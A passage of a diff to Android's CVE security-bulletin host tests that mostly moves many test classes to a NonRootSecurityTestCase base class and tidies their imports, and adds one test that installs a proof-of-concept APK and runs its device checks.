--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11282.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11282.java
@@ -4,12 +4,15 @@ import static org.junit.Assert.*;
import static org.junit.Assume.*;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_11282 extends SecurityTestCase {
+public class CVE_2020_11282 extends NonRootSecurityTestCase {
/**
* CVE-2020-11282
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
index a285cd37397..a5e655737b9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
@@ -16,14 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import static org.junit.Assert.*;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_29374 extends SecurityTestCase {
+public class CVE_2020_29374 extends NonRootSecurityTestCase {
/**
* b/174737879
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29661.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29661.java
index db50504616d..c02a2eca108 100755
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29661.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29661.java
@@ -16,14 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import static org.junit.Assert.*;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_29661 extends SecurityTestCase {
+public class CVE_2020_29661 extends NonRootSecurityTestCase {
/**
* b/182917768
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
index 4b1bc22e33f..9df42ae7cf7 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
@@ -22,7 +22,7 @@ import android.util.Log;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.After;
import org.junit.Assert;
@@ -38,7 +38,7 @@ import org.junit.runner.RunWith;
* collected from the hostside and reported accordingly.
*/
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0305 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0305 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0305";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0305.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0313.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0313.java
index 2cd9f7a28d4..c85c7325597 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0313.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0313.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0313 extends SecurityTestCase {
+public class CVE_2021_0313 extends NonRootSecurityTestCase {
/**
* b/170968514
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0315.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0315.java
index 7487d151c7f..1476e911236 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0315.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0315.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -27,25 +27,24 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0315 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0315 extends NonRootSecurityTestCase {
static final String TEST_PKG = "android.security.cts.CVE_2021_0315";
- ITestDevice mDevice;
@After
public void tearDown() throws Exception {
- AdbUtils.runCommandLine("input keyevent KEYCODE_BACK", mDevice);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_BACK", getDevice());
}
@AsbSecurityTest(cveBugId = 169763814)
@Test
public void testPocCVE_2021_0315() throws Exception {
- mDevice = getDevice();
- uninstallPackage(mDevice, TEST_PKG);
+ ITestDevice device = getDevice();
+ uninstallPackage(device, TEST_PKG);
/* Wake up the screen */
- AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", mDevice);
- AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", mDevice);
- AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", mDevice);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
installPackage("CVE-2021-0315.apk");
runDeviceTests(TEST_PKG, TEST_PKG + ".DeviceTest", "testOverlayButtonPresence");
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
index fa4b66b985b..15cdab54d96 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.compatibility.common.util.CrashUtils;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0330 extends SecurityTestCase {
+public class CVE_2021_0330 extends NonRootSecurityTestCase {
/**
* b/170732441
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
index 585d19bfbd2..71ce363ba8b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0430 extends SecurityTestCase {
+public class CVE_2021_0430 extends NonRootSecurityTestCase {
/**
* b/178725766
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
index fb7638c2a9d..6a22748d840 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0439 extends SecurityTestCase {
+public class CVE_2021_0439 extends NonRootSecurityTestCase {
/**
* b/174243830
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0441.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0441.java
new file mode 100644
index 00000000000..57b9a86c191
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0441.java
@@ -0,0 +1,51 @@
+/**
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Assert;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0441 extends NonRootSecurityTestCase {
+ static final String TEST_PKG = "android.security.cts.CVE_2021_0441";
+ static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ static final String TEST_APP = "CVE-2021-0441.apk";
+
+ /**
+ * b/174495520
+ */
+ @AsbSecurityTest(cveBugId = 174495520)
+ @Test
+ public void testPocCVE_2021_0441() throws Exception {
+ ITestDevice device = getDevice();
+ uninstallPackage(device, TEST_PKG);
+
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ installPackage(TEST_APP);
+ runDeviceTests(TEST_PKG, TEST_CLASS, "testCVE_2021_0441");
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0473.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0473.java
index 1224dc2da2d..90e65c2e338 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0473.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0473.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0473 extends SecurityTestCase {
+public class CVE_2021_0473 extends NonRootSecurityTestCase {
/**
* b/179687208
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
index a3b1eae7c67..558b0924fbf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
@@ -18,13 +18,16 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
import android.platform.test.annotations.SecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0478 extends SecurityTestCase {
+public class CVE_2021_0478 extends NonRootSecurityTestCase {
/**
* b/169255797
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java
index 4d2acacf2ff..05aa43e47c1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0484 extends SecurityTestCase {
+public class CVE_2021_0484 extends NonRootSecurityTestCase {
/**
* b/173720767
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0490.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0490.java
index 8f37185a69d..b26e0725ff4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0490.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0490.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0490 extends SecurityTestCase {
+public class CVE_2021_0490 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 183464868)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0523.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0523.java
index 3e6928853de..91f0b94b322 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0523.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0523.java
@@ -20,7 +20,7 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Before;
@@ -28,7 +28,7 @@ import org.junit.runner.RunWith;
import org.junit.Test;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0523 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0523 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.cve_2021_0523";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0523.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0586.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0586.java
index 5a7ec8d1c24..f775822dfb6 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0586.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0586.java
@@ -20,14 +20,14 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Before;
import org.junit.runner.RunWith;
import org.junit.Test;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0586 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0586 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.cve_2021_0586";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0586.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
index eb74b201862..92c64351de4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
@@ -21,7 +21,7 @@ import android.platform.test.annotations.AsbSecurityTest;
import android.platform.test.annotations.RequiresDevice;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import java.util.regex.Pattern;
import org.junit.Assert;
import org.junit.Before;
@@ -33,7 +33,7 @@ import static org.junit.Assert.assertThat;
import static org.junit.Assume.assumeTrue;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0591 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0591 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0591";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
index 0562b49b756..fecab0cf3e4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0596 extends SecurityTestCase {
+public class CVE_2021_0596 extends NonRootSecurityTestCase {
/**
* b/181346550
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0636.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0636.java
index d4bbfb3972e..41455a40249 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0636.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0636.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import static org.junit.Assert.*;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0636 extends SecurityTestCase {
+public class CVE_2021_0636 extends NonRootSecurityTestCase {
public void testPocCVE_2021_0636(String mediaFileName) throws Exception {
/*
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0642.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0642.java
index 29fd2b39bf2..2e1ddda5360 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0642.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0642.java
@@ -19,7 +19,7 @@ package android.security.cts;
import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -29,7 +29,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0642 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0642 extends NonRootSecurityTestCase {
static final String TEST_APP = "CVE-2021-0642.apk";
static final String TEST_PKG = "android.security.cts.cve_2021_0642";
static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0650.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0650.java
index e6cd19f1d0b..24505d316a0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0650.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0650.java
@@ -17,14 +17,18 @@
package android.security.cts;
+import static org.junit.Assume.*;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
-import static org.junit.Assume.*;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0650 extends SecurityTestCase {
+public class CVE_2021_0650 extends NonRootSecurityTestCase {
/**
* b/190286685
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0685.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0685.java
index 26bba4a6d50..15c59efc97e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0685.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0685.java
@@ -19,14 +19,14 @@ package android.security.cts;
import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Before;
import org.junit.runner.RunWith;
import org.junit.Test;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0685 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0685 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.cve_2021_0685";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0685.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0689.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0689.java
index 666f7918718..3bfcae4af64 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0689.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0689.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0689 extends SecurityTestCase {
+public class CVE_2021_0689 extends NonRootSecurityTestCase {
/**
* b/190188264
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0691.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0691.java
index bf261fd0eab..01a3c07160b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0691.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0691.java
@@ -22,7 +22,7 @@ import android.util.Log;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.log.LogUtil.CLog;
import org.junit.After;
@@ -38,7 +38,7 @@ import static org.hamcrest.CoreMatchers.*;
* Test installs sample app and then tries to overwrite *.apk file
*/
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0691 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0691 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0691";
private static final String TEST_APP = "CVE-2021-0691.apk";
private static final String DEVICE_TMP_DIR = "/data/local/tmp/";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0693.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0693.java
index 2b7ad1452d2..98deb18e315 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0693.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0693.java
@@ -19,13 +19,13 @@ package android.security.cts;
import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0693 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0693 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0693";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0706.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0706.java
index fabaf89437a..9225b561ece 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0706.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0706.java
@@ -20,13 +20,13 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Before;
import org.junit.runner.RunWith;
import org.junit.Test;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0706 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0706 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0706";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0919.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0919.java
index 3ae0303371d..513942520a0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0919.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0919.java
@@ -18,13 +18,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0919 extends SecurityTestCase {
+public class CVE_2021_0919 extends NonRootSecurityTestCase {
/**
* b/197336441
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
index 760c265fe09..94f3b970c57 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
@@ -20,7 +20,7 @@ import android.platform.test.annotations.AppModeFull;
import android.util.Log;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.log.LogUtil.CLog;
import org.junit.After;
import org.junit.Assert;
@@ -30,7 +30,7 @@ import org.junit.runner.RunWith;
import static org.junit.Assert.*;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0921 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0921 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0921";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0921.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0925.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0925.java
index 617658973bb..b3c9717a280 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0925.java
